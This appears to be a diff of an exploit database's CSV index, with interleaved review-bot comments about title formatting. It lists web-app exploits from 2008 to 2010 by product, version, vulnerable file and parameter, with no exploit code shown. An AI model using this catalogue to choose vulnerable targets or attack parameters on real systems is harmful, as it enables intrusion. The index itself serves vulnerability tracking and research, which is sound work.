7432,platforms/php/webapps/7432.txt,"Xpoze 4.10 - 'menu' Parameter Blind SQL Injection",2008-12-12,XaDoS,php,webapps,0
7433,platforms/php/webapps/7433.txt,"Social Groupie - 'id' Parameter SQL Injection",2008-12-12,InjEctOr5,php,webapps,0
7434,platforms/php/webapps/7434.sh,"Wysi Wiki Wyg 1.0 - Remote Password Retrieve Exploit",2008-12-12,StAkeR,php,webapps,0
7435,platforms/php/webapps/7435.txt,"Social Groupie - 'create_album.php' Arbitrary File Upload",2008-12-12,InjEctOr5,php,webapps,0
7436,platforms/asp/webapps/7436.txt,"the net guys aspired2blog - SQL Injection / File Disclosure",2008-12-12,Pouya_Server,asp,webapps,0
7437,platforms/php/webapps/7437.txt,"Moodle 1.9.3 - Remote Code Execution",2008-12-12,USH,php,webapps,0
7438,platforms/asp/webapps/7438.txt,"VP-ASP Shopping Cart 6.50 - Database Disclosure",2008-12-12,Dxil,asp,webapps,0
7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' SQL Injection",2008-12-12,InjEctOr5,php,webapps,0
7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' Parameter SQL Injection",2008-12-12,InjEctOr5,php,webapps,0
7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,asp,webapps,0
7441,platforms/php/webapps/7441.txt,"Joomla! Component live chat - SQL Injection / Open Proxy",2008-12-12,jdc,php,webapps,0
7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps,0
7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,php,webapps,0
7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - 'quote.mdb' Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System - (Authentication Bypass) SQL Injection",2008-12-14,Pouya_Server,asp,webapps,0
7446,platforms/asp/webapps/7446.txt,"ASPired2Quote - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0
7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System - Authentication Bypass",2008-12-14,Pouya_Server,asp,webapps,0
7448,platforms/php/webapps/7448.txt,"autositephp 2.0.3 - Local File Inclusion / Cross-Site Request Forgery / Edit File",2008-12-14,SirGod,php,webapps,0
7449,platforms/php/webapps/7449.txt,"iyzi Forum 1.0b3 - (iyziforum.mdb) Database Disclosure",2008-12-14,"Ghost Hacker",php,webapps,0
7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum - 'CAForum.mdb' Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps,0
7449,platforms/php/webapps/7449.txt,"iyzi Forum 1.0b3 - Database Disclosure",2008-12-14,"Ghost Hacker",php,webapps,0
7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum - Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps,0
7451,platforms/php/webapps/7451.txt,"PHP weather 2.2.2 - Local File Inclusion / Cross-Site Scripting",2008-12-14,ahmadbady,php,webapps,0
7453,platforms/php/webapps/7453.txt,"FLDS 1.2a - (redir.php id) SQL Injection",2008-12-14,nuclear,php,webapps,0
7453,platforms/php/webapps/7453.txt,"FLDS 1.2a - 'redir.php' SQL Injection",2008-12-14,nuclear,php,webapps,0
7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 - 'download.php' Remote",2008-12-14,x0r,php,webapps,0
7456,platforms/php/webapps/7456.txt,"AvailScript Article Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps,0
7457,platforms/php/webapps/7457.txt,"AvailScript Classmate Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps,0
7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 - (index.php lang) Local File Inclusion",2008-12-14,Osirys,php,webapps,0
7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 - 'lang' Parameter Local File Inclusion",2008-12-14,Osirys,php,webapps,0
7459,platforms/php/webapps/7459.txt,"CFAGCMS 1 - Remote File Inclusion",2008-12-14,BeyazKurt,php,webapps,0
7461,platforms/php/webapps/7461.txt,"Flatnux - html/JavaScript Injection Cookie Grabber Exploit",2008-12-14,gmda,php,webapps,0
7462,platforms/asp/webapps/7462.txt,"ASPSiteWare Home Builder 1.0/2.0 - SQL Injection",2008-12-14,AlpHaNiX,asp,webapps,0
7463,platforms/php/webapps/7463.txt,"ASPSiteWare Automotive Dealer 1.0 / 2.0 - SQL Injection",2008-12-14,AlpHaNiX,php,webapps,0
7464,platforms/asp/webapps/7464.txt,"ASPSiteWare RealtyListing 1.0 / 2.0 - SQL Injection",2008-12-14,AlpHaNiX,asp,webapps,0
7465,platforms/php/webapps/7465.txt,"isweb CMS 3.0 - SQL Injection / Cross-Site Scripting",2008-12-14,XaDoS,php,webapps,0
7466,platforms/asp/webapps/7466.txt,"Forest Blog 1.3.2 - (blog.mdb) Remote Database Disclosure",2008-12-15,"Cold Zero",asp,webapps,0
7468,platforms/asp/webapps/7468.txt,"CodeAvalanche Directory - 'CADirectory.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
7469,platforms/asp/webapps/7469.txt,"CodeAvalanche FreeForAll - 'CAFFAPage.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
7466,platforms/asp/webapps/7466.txt,"Forest Blog 1.3.2 - Remote Database Disclosure",2008-12-15,"Cold Zero",asp,webapps,0
7468,platforms/asp/webapps/7468.txt,"CodeAvalanche Directory - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
7469,platforms/asp/webapps/7469.txt,"CodeAvalanche FreeForAll - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
7470,platforms/asp/webapps/7470.txt,"CodeAvalanche FreeWallpaper - Remote Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
7471,platforms/asp/webapps/7471.txt,"CodeAvalanche Articles - 'CAArticles.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
7472,platforms/asp/webapps/7472.txt,"CodeAvalanche RateMySite - 'CARateMySite.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
7471,platforms/asp/webapps/7471.txt,"CodeAvalanche Articles - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
7472,platforms/asp/webapps/7472.txt,"CodeAvalanche RateMySite - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
7473,platforms/php/webapps/7473.php,"EZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation",2008-12-15,s4avrd0w,php,webapps,0
7474,platforms/php/webapps/7474.txt,"FLDS 1.2a - (lpro.php id) SQL Injection",2008-12-15,nuclear,php,webapps,0
7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 - 'Username' Cross-Site Request Forgery/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0
7474,platforms/php/webapps/7474.txt,"FLDS 1.2a - 'lpro.php' SQL Injection",2008-12-15,nuclear,php,webapps,0
7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 - Cross-Site Request Forgery/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0
7476,platforms/php/webapps/7476.txt,"Mediatheka 4.2 - Blind SQL Injection",2008-12-15,StAkeR,php,webapps,0
7478,platforms/php/webapps/7478.txt,"The Rat CMS Alpha 2 - (Authentication Bypass) SQL Injection",2008-12-15,x0r,php,webapps,0
7479,platforms/php/webapps/7479.txt,"XOOPS Module Amevents - 'print.php id' SQL Injection",2008-12-15,nétRoot,php,webapps,0
7480,platforms/php/webapps/7480.txt,"CadeNix - 'cid' SQL Injection",2008-12-15,HaCkeR_EgY,php,webapps,0
7478,platforms/php/webapps/7478.txt,"The Rat CMS Alpha 2 - Authentication Bypass",2008-12-15,x0r,php,webapps,0
7479,platforms/php/webapps/7479.txt,"XOOPS Module Amevents - SQL Injection",2008-12-15,nétRoot,php,webapps,0
7480,platforms/php/webapps/7480.txt,"CadeNix - SQL Injection",2008-12-15,HaCkeR_EgY,php,webapps,0
7481,platforms/php/webapps/7481.txt,"WorkSimple 1.2.1 - Remote File Inclusion / Sensitive Data Disclosure",2008-12-15,Osirys,php,webapps,0
7482,platforms/php/webapps/7482.txt,"Aperto Blog 0.1.1 - Local File Inclusion / SQL Injection",2008-12-15,NoGe,php,webapps,0
7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - 'right.php title' SQL Injection",2008-12-15,ZoRLu,php,webapps,0
7483,platforms/php/webapps/7483.txt,"CFAGCMS 1 - SQL Injection",2008-12-15,ZoRLu,php,webapps,0
7484,platforms/asp/webapps/7484.txt,"Click&BaneX - Multiple SQL Injections",2008-12-15,AlpHaNiX,asp,webapps,0
7485,platforms/asp/webapps/7485.txt,"clickandemail - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
7486,platforms/asp/webapps/7486.txt,"click&rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps,0
7487,platforms/php/webapps/7487.txt,"FaScript FaUpload - 'download.php' SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0
7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - (WWGGuestbook.mdb) DD",2008-12-16,"Cold Zero",asp,webapps,0
7489,platforms/php/webapps/7489.pl,"FLDS 1.2a - report.php (linkida) SQL Injection",2008-12-16,ka0x,php,webapps,0
7487,platforms/php/webapps/7487.txt,"FaScript FaUpload - SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0
7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - Database Disclosure",2008-12-16,"Cold Zero",asp,webapps,0
7489,platforms/php/webapps/7489.pl,"FLDS 1.2a - 'report.php' SQL Injection",2008-12-16,ka0x,php,webapps,0
7490,platforms/php/webapps/7490.php,"Aiyoota! CMS - Blind SQL Injection",2008-12-16,Lidloses_Auge,php,webapps,0
7491,platforms/asp/webapps/7491.txt,"Nukedit 4.9.8 - Remote Database Disclosure",2008-12-16,Cyber.Zer0,asp,webapps,0
7493,platforms/php/webapps/7493.txt,"Liberum Help Desk 0.97.3 - SQL Injection / File Disclosure",2008-12-16,"Cold Zero",php,webapps,0
7494,platforms/php/webapps/7494.txt,"Zelta E Store - Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection",2008-12-16,ZoRLu,php,webapps,0
7495,platforms/asp/webapps/7495.txt,"Gnews Publisher .NET - (authors.asp authorID) SQL Injection",2008-12-16,AlpHaNiX,asp,webapps,0
7495,platforms/asp/webapps/7495.txt,"Gnews Publisher .NET - SQL Injection",2008-12-16,AlpHaNiX,asp,webapps,0
7497,platforms/php/webapps/7497.txt,"RSMScript 1.21 - Cross-Site Scripting / Insecure Cookie Handling",2008-12-17,Osirys,php,webapps,0
7499,platforms/asp/webapps/7499.txt,"BP Blog 6.0/7.0/8.0/9.0 - Remote Database Disclosure",2008-12-17,Dxil,asp,webapps,0
7500,platforms/php/webapps/7500.txt,"K&S Shopsysteme - Arbitrary File Upload",2008-12-17,mNt,php,webapps,0
7502,platforms/php/webapps/7502.txt,"r.cms 2.0 - Multiple SQL Injections",2008-12-17,Lidloses_Auge,php,webapps,0
7504,platforms/php/webapps/7504.txt,"Joomla! Component Tech Article 1.x - (item) SQL Injection",2008-12-17,InjEctOr5,php,webapps,0
7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - (index.php menuID) SQL Injection",2008-12-17,AnGeL25dZ,php,webapps,0
7504,platforms/php/webapps/7504.txt,"Joomla! Component Tech Article 1.x - SQL Injection",2008-12-17,InjEctOr5,php,webapps,0
7506,platforms/php/webapps/7506.txt,"TinyMCE 2.0.1 - 'menuID' Parameter SQL Injection",2008-12-17,AnGeL25dZ,php,webapps,0
7507,platforms/php/webapps/7507.pl,"Lizardware CMS 0.6.0 - Blind SQL Injection",2008-12-17,StAkeR,php,webapps,0
7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS - 'QuickerSite.mdb' Database Disclosure",2008-12-17,AlpHaNiX,asp,webapps,0
7508,platforms/asp/webapps/7508.txt,"QuickerSite Easy CMS - Database Disclosure",2008-12-17,AlpHaNiX,asp,webapps,0
7509,platforms/php/webapps/7509.txt,"Mini File Host 1.x - Arbitrary .PHP File Upload",2008-12-18,Pouya_Server,php,webapps,0
7510,platforms/php/webapps/7510.txt,"2532/Gigs 1.2.2 Stable - Multiple Vulnerabilities",2008-12-18,Osirys,php,webapps,0
7511,platforms/php/webapps/7511.txt,"2532/Gigs 1.2.2 Stable - Remote Login Bypass",2008-12-18,StAkeR,php,webapps,0
7512,platforms/php/webapps/7512.php,"2532/Gigs 1.2.2 Stable - Remote Command Execution",2008-12-18,StAkeR,php,webapps,0
7513,platforms/php/webapps/7513.txt,"Calendar Script 1.1 - Insecure Cookie Handling",2008-12-18,Osirys,php,webapps,0
7514,platforms/php/webapps/7514.txt,"I-Rater Basic - 'messages.php' SQL Injection",2008-12-18,boom3rang,php,webapps,0
7514,platforms/php/webapps/7514.txt,"I-Rater Basic - SQL Injection",2008-12-18,boom3rang,php,webapps,0
7515,platforms/php/webapps/7515.txt,"phpclanwebsite 1.23.3 fix pack #5 - Multiple Vulnerabilities",2008-12-18,s4avrd0w,php,webapps,0
7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 - 'id' SQL Injection",2008-12-18,fuzion,php,webapps,0
7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 - 'id' Parameter SQL Injection",2008-12-18,fuzion,php,webapps,0
7518,platforms/php/webapps/7518.txt,"Gobbl CMS 1.0 - Insecure Cookie Handling",2008-12-18,x0r,php,webapps,0
7519,platforms/php/webapps/7519.txt,"MyPHPsite - 'index.php mod' Local File Inclusion",2008-12-18,Piker,php,webapps,0
7522,platforms/php/webapps/7522.pl,"MyPBS - 'index.php seasonID' SQL Injection",2008-12-19,Piker,php,webapps,0
7519,platforms/php/webapps/7519.txt,"MyPHPsite - Local File Inclusion",2008-12-18,Piker,php,webapps,0
7522,platforms/php/webapps/7522.pl,"MyPBS - 'seasonID' Parameter SQL Injection",2008-12-19,Piker,php,webapps,0
7523,platforms/php/webapps/7523.php,"ReVou Twitter Clone - Admin Password Change",2008-12-19,G4N0K,php,webapps,0
7524,platforms/php/webapps/7524.txt,"Online Keyword Research Tool - 'download.php' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0
7525,platforms/php/webapps/7525.txt,"Extract Website - 'download.php Filename' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0
7525,platforms/php/webapps/7525.txt,"Extract Website - 'Filename' Parameter File Disclosure",2008-12-19,"Cold Zero",php,webapps,0
7526,platforms/php/webapps/7526.txt,"myPHPscripts Login Session 2.0 - Cross-Site Scripting / Database Disclosure",2008-12-19,Osirys,php,webapps,0
7527,platforms/php/webapps/7527.txt,"FreeLyrics 1.0 - (source.php p) Remote File Disclosure",2008-12-19,Piker,php,webapps,0
7527,platforms/php/webapps/7527.txt,"FreeLyrics 1.0 - Remote File Disclosure",2008-12-19,Piker,php,webapps,0
7528,platforms/php/webapps/7528.pl,"OneOrZero helpdesk 1.6.x. - Arbitrary File Upload",2008-12-19,Ams,php,webapps,0
7529,platforms/php/webapps/7529.txt,"Constructr CMS 3.02.5 stable - Multiple Vulnerabilities",2008-12-19,fuzion,php,webapps,0
7530,platforms/php/webapps/7530.pl,"Userlocator 3.0 - (y) Blind SQL Injection",2008-12-21,katharsis,php,webapps,0
7530,platforms/php/webapps/7530.pl,"Userlocator 3.0 - Blind SQL Injection",2008-12-21,katharsis,php,webapps,0
7531,platforms/php/webapps/7531.txt,"ReVou Twitter Clone - Arbitrary File Upload",2008-12-21,S.W.A.T.,php,webapps,0
7532,platforms/php/webapps/7532.txt,"chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting",2008-12-21,BugReport.IR,php,webapps,0
7532,platforms/php/webapps/7532.txt,"Chicomas 2.0.4 - Database Backup / File Disclosure / Cross-Site Scripting",2008-12-21,BugReport.IR,php,webapps,0
7534,platforms/asp/webapps/7534.txt,"Emefa Guestbook 3.0 - Remote Database Disclosure",2008-12-21,Cyber.Zer0,asp,webapps,0
7537,platforms/php/webapps/7537.txt,"BLOG 1.55B - (image_upload.php) Arbitrary File Upload",2008-12-21,Piker,php,webapps,0
7537,platforms/php/webapps/7537.txt,"BLOG 1.55B - 'image_upload.php' Arbitrary File Upload",2008-12-21,Piker,php,webapps,0
7538,platforms/php/webapps/7538.txt,"Joomla! Component com_hbssearch 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0
7539,platforms/php/webapps/7539.txt,"Joomla! Component com_tophotelmodule 1.0 - Blind SQL Injection",2008-12-21,boom3rang,php,webapps,0
7540,platforms/php/webapps/7540.txt,"phpg 1.6 - Cross-Site Scripting / Full Path Disclosure / Denial of Service",2008-12-21,"Anarchy Angel",php,webapps,0
7541,platforms/php/webapps/7541.pl,"RSS Simple News - 'news.php pid' SQL Injection",2008-12-22,Piker,php,webapps,0
7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script - 'Filename' File Disclosure",2008-12-22,SirGod,php,webapps,0
7541,platforms/php/webapps/7541.pl,"RSS Simple News - SQL Injection",2008-12-22,Piker,php,webapps,0
7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script - 'Filename' Parameter File Disclosure",2008-12-22,SirGod,php,webapps,0
7543,platforms/php/webapps/7543.txt,"WordPress Plugin Page Flip Image Gallery 0.2.2 - Remote File Disclosure",2008-12-22,GoLd_M,php,webapps,0
7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b - (check_url.php url) Arbitrary File Upload / SQL Injection",2008-12-22,Ams,php,webapps,0
7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b - Arbitrary File Upload / SQL Injection",2008-12-22,Ams,php,webapps,0
7545,platforms/php/webapps/7545.txt,"yourplace 1.0.2 - Multiple Vulnerabilities / Remote Code Execution",2008-12-22,Osirys,php,webapps,0
7546,platforms/php/webapps/7546.txt,"Joomla! Component Volunteer 2.0 - (job_id) SQL Injection",2008-12-22,boom3rang,php,webapps,0
7546,platforms/php/webapps/7546.txt,"Joomla! Component Volunteer 2.0 - SQL Injection",2008-12-22,boom3rang,php,webapps,0
7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 - (Forum) Remote Cookies Disclosure",2008-12-22,StAkeR,php,webapps,0
7549,platforms/php/webapps/7549.txt,"Roundcube Webmail 0.2-3 Beta - Code Execution",2008-12-22,"Jacobo Avariento",php,webapps,0
7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 - (Authentication Bypass) SQL Injection",2008-12-22,StAkeR,php,webapps,0
7552,platforms/php/webapps/7552.txt,"REDPEACH CMS - (zv) SQL Injection",2008-12-22,Lidloses_Auge,php,webapps,0
7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 - Authentication Bypass",2008-12-22,StAkeR,php,webapps,0
7552,platforms/php/webapps/7552.txt,"REDPEACH CMS - SQL Injection",2008-12-22,Lidloses_Auge,php,webapps,0
7553,platforms/php/webapps/7553.sh,"Roundcube Webmail 0.2b - Remote Code Execution",2008-12-22,Hunger,php,webapps,0
7557,platforms/php/webapps/7557.txt,"PHPmotion 2.1 - Cross-Site Request Forgery",2008-12-23,Ausome1,php,webapps,0
7558,platforms/php/webapps/7558.txt,"PHPLD 3.3 - (page.php name) Blind SQL Injection",2008-12-23,fuzion,php,webapps,0
7558,platforms/php/webapps/7558.txt,"PHPLD 3.3 - Blind SQL Injection",2008-12-23,fuzion,php,webapps,0
7559,platforms/php/webapps/7559.php,"CMS NetCat 3.12 - (password_recovery.php) Blind SQL Injection",2008-12-23,s4avrd0w,php,webapps,0
7560,platforms/php/webapps/7560.txt,"CMS NetCat 3.12 - Multiple Vulnerabilities",2008-12-23,s4avrd0w,php,webapps,0
7561,platforms/php/webapps/7561.txt,"phpGreetCards - Cross-Site Scripting / Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0
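Review bot: the old "(file param)" titles in this hunk are rewritten three different ways: 7474 keeps only the file ("'lpro.php' SQL Injection"), 7506 keeps only the parameter ("'menuID' Parameter SQL Injection"), and 7479 drops both ("XOOPS Module Amevents - SQL Injection"). Pick one convention and apply it to every entry touched here, so a search by file or parameter name behaves the same across entries. 7548 "(Forum)" and 7559 "(password_recovery.php)" still carry the old parenthesised form and could be converted in the same pass.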
@ -20407,7 +20407,7 @@ id,file,description,date,author,platform,type,port
7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' SQL Injection",2009-01-04,DaiMon,php,webapps,0
7660,platforms/php/webapps/7660.txt,"PHPMesFilms 1.0 - (index.php id) SQL Injection",2009-01-04,SuB-ZeRo,php,webapps,0
7663,platforms/php/webapps/7663.txt,"plxAutoReminder 3.7 - 'id' SQL Injection",2009-01-04,ZoRLu,php,webapps,0
7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 - 'viewarticle.php id' Blind SQL Injection",2009-01-04,darkjoker,php,webapps,0
7664,platforms/php/webapps/7664.pl,"The Rat CMS Alpha 2 - Blind SQL Injection",2009-01-04,darkjoker,php,webapps,0
7665,platforms/asp/webapps/7665.txt,"Ayemsis Emlak Pro - 'acc.mdb' Database Disclosure",2009-01-05,ByALBAYX,asp,webapps,0
7666,platforms/asp/webapps/7666.txt,"Ayemsis Emlak Pro - (Authentication Bypass) SQL Injection",2009-01-05,ByALBAYX,asp,webapps,0
7667,platforms/php/webapps/7667.txt,"Joomla! Component simple_review 1.x - SQL Injection",2009-01-05,EcHoLL,php,webapps,0
@ -20568,7 +20568,7 @@ id,file,description,date,author,platform,type,port
7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple SQL Injections Vulnerabilities",2009-01-29,Zigma,php,webapps,0
7916,platforms/php/webapps/7916.txt,"Netartmedia Car Portal 1.0 - (Authentication Bypass) SQL Injection",2009-01-29,"Mehmet Ince",php,webapps,0
7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - (login.php school) Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0
7922,platforms/php/webapps/7922.txt,"Pligg 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0
7922,platforms/php/webapps/7922.txt,"Pligg CMS 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0
7924,platforms/asp/webapps/7924.txt,"SalesCart - (Authentication Bypass) SQL Injection",2009-01-30,ByALBAYX,asp,webapps,0
7925,platforms/php/webapps/7925.txt,"Revou Twitter Clone - Cross-Site Scripting / SQL Injection",2009-01-30,nuclear,php,webapps,0
7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0
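Review bot: the rename of 7922 to "Pligg CMS 9.9.5" is not carried through to 7544, which this same patch edits but leaves as "Pligg 9.9.5b - Arbitrary File Upload / SQL Injection". With both spellings in the file, a lookup on the product name returns only part of the Pligg entries. Suggest changing 7544 to "Pligg CMS 9.9.5b - ..." so all entries for the product share one prefix.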
@ -20577,7 +20577,7 @@ id,file,description,date,author,platform,type,port
7932,platforms/php/webapps/7932.txt,"SkaLinks 1.5 - Authentication Bypass",2009-01-30,Dimi4,php,webapps,0
7933,platforms/php/webapps/7933.txt,"eVision CMS 2.0 - (field) SQL Injection",2009-01-30,darkjoker,php,webapps,0
7936,platforms/php/webapps/7936.txt,"sma-db 0.3.12 - Remote File Inclusion / Cross-Site Scripting",2009-02-02,ahmadbady,php,webapps,0
7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - (Job fields) Cross-Site Scripting / Iframe Injection (PoC)",2009-02-02,"Alfons Luja",php,webapps,0
7938,platforms/php/webapps/7938.txt,"Flatnux 2009-01-27 - Cross-Site Scripting / Iframe Injection (PoC)",2009-02-02,"Alfons Luja",php,webapps,0
7939,platforms/php/webapps/7939.txt,"AJA Portal 1.2 (Windows) - Local File Inclusion",2009-02-02,ahmadbady,php,webapps,0
7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0
7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect - (Authentication Bypass) SQL Injection",2009-02-02,ByALBAYX,php,webapps,0
@ -20602,7 +20602,7 @@ id,file,description,date,author,platform,type,port
7965,platforms/php/webapps/7965.txt,"technote 7.2 - Remote File Inclusion",2009-02-03,make0day,php,webapps,0
7967,platforms/php/webapps/7967.pl,"TxtBlog 1.0 Alpha - Remote Command Execution",2009-02-03,Osirys,php,webapps,0
7968,platforms/php/webapps/7968.php,"DreamPics Photo/Video Gallery - Blind SQL Injection",2009-02-03,"Mehmet Ince",php,webapps,0
7969,platforms/php/webapps/7969.txt,"flatnux 2009-01-27 - Remote File Inclusion",2009-02-03,"Alfons Luja",php,webapps,0
7969,platforms/php/webapps/7969.txt,"Flatnux 2009-01-27 - Remote File Inclusion",2009-02-03,"Alfons Luja",php,webapps,0
7972,platforms/php/webapps/7972.py,"OpenFiler 2.3 - (Authentication Bypass) Remote Password Change Exploit",2009-02-03,nonroot,php,webapps,0
7976,platforms/php/webapps/7976.txt,"Jaws 0.8.8 - Multiple Local File Inclusion",2009-02-04,fuzion,php,webapps,0
7977,platforms/php/webapps/7977.txt,"Syntax Desktop 2.7 - (synTarget) Local File Inclusion",2009-02-04,ahmadbady,php,webapps,0
@ -20881,10 +20881,10 @@ id,file,description,date,author,platform,type,port
8480,platforms/php/webapps/8480.txt,"multi-lingual E-Commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0
8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Arbitrary File Upload",2009-04-20,JosS,php,webapps,0
8482,platforms/php/webapps/8482.txt,"Seditio CMS Events Plugin - (c) SQL Injection",2009-04-20,OoN_Boy,php,webapps,0
8483,platforms/php/webapps/8483.txt,"flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure",2009-04-20,girex,php,webapps,0
8483,platforms/php/webapps/8483.txt,"Flatnux 2009-03-27 - Arbitrary File Upload / Information Disclosure",2009-04-20,girex,php,webapps,0
8486,platforms/php/webapps/8486.txt,"webClassifieds 2005 - (Authentication Bypass) Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0
8487,platforms/php/webapps/8487.txt,"EZ Webitor - (Authentication Bypass) SQL Injection",2009-04-20,snakespc,php,webapps,0
8488,platforms/php/webapps/8488.pl,"Pligg 9.9.0 - (editlink.php id) Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0
8488,platforms/php/webapps/8488.pl,"Pligg CMS 9.9.0 - 'editlink.php' Blind SQL Injection",2009-04-20,"Rohit Bansal",php,webapps,0
8491,platforms/php/webapps/8491.pl,"WysGui CMS 1.2b - (Insecure Cookie Handling) Blind SQL Injection",2009-04-20,YEnH4ckEr,php,webapps,0
8492,platforms/php/webapps/8492.txt,"WB News 2.1.2 - Insecure Cookie Handling",2009-04-20,"ThE g0bL!N",php,webapps,0
8493,platforms/php/webapps/8493.txt,"fungamez rc1 - Authentication Bypass / Local File Inclusion",2009-04-20,YEnH4ckEr,php,webapps,0
@ -21589,7 +21589,7 @@ id,file,description,date,author,platform,type,port
9703,platforms/php/webapps/9703.txt,"phpPollScript 1.3 - (include_class) Remote File Inclusion",2009-09-16,cr4wl3r,php,webapps,0
9706,platforms/php/webapps/9706.txt,"Joomla! Component com_album 1.14 - Directory Traversal",2009-09-17,DreamTurk,php,webapps,0
9708,platforms/php/webapps/9708.txt,"OpenSiteAdmin 0.9.7b - (pageHeader.php path) Remote File Inclusion",2009-09-17,"EA Ngel",php,webapps,0
9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x - 'itemID' SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0
9710,platforms/php/webapps/9710.txt,"CF Shopkart 5.3x - 'itemID' Parameter SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0
9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injections",2009-09-17,"learn3r hacker",php,webapps,0
9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - (Authentication Bypass) SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0
9713,platforms/php/webapps/9713.pl,"Joomla! Component com_jreservation 1.5 - 'pid' Blind SQL Injection",2009-09-17,"Chip d3 bi0s",php,webapps,0
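Review bot: 9710 gains the "'itemID' Parameter SQL Injection" wording, but 9713 three lines below in the same hunk still reads "'pid' Blind SQL Injection" without the "Parameter" suffix. If the quoted-name-plus-"Parameter" form is the target style, update 9713 here as well; otherwise the two adjacent entries describe the same kind of input in different formats.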
@ -22494,7 +22494,7 @@ id,file,description,date,author,platform,type,port
11547,platforms/php/webapps/11547.txt,"PHP Auktion Pro SQL - 'news.php' SQL Injection",2010-02-23,"Easy Laster",php,webapps,0
11548,platforms/php/webapps/11548.txt,"Top Auktion - 'news.php' SQL Injection",2010-02-23,"Easy Laster",php,webapps,0
11549,platforms/php/webapps/11549.pl,"Joomla! Component user_id com_sqlreport - Blind SQL Injection",2010-02-23,snakespc,php,webapps,0
